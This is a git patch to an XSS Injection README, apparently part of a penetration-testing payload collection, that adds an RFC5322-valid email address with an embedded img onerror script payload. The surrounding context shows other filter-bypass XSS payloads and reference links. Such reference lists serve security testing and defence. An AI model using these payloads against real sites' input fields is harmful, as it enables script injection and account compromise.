From fcf69f82266dd7c8a795e0ed0fb22383320c52be Mon Sep 17 00:00:00 2001
From: dave <dave@cyllective.com>
Date: Fri, 31 May 2024 13:27:32 +0200
Subject: [PATCH] Add additional XSS payload in email addresses RFC5322

---
 XSS Injection/README.md | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 5fae506..3a22514 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -783,6 +783,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 "><svg/onload=confirm(1)>"@x.y
 ```
 
+([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
+
+```javascript
+xss@example.com(<img src='x' onerror='alert(document.location)'>)
+```
+
 ### Bypass document blacklist
 
 ```javascript
@@ -1405,4 +1411,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
 - [Bypass < with ＜](https://hackerone.com/reports/639684)
 - [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
-- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)
\ No newline at end of file
+- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)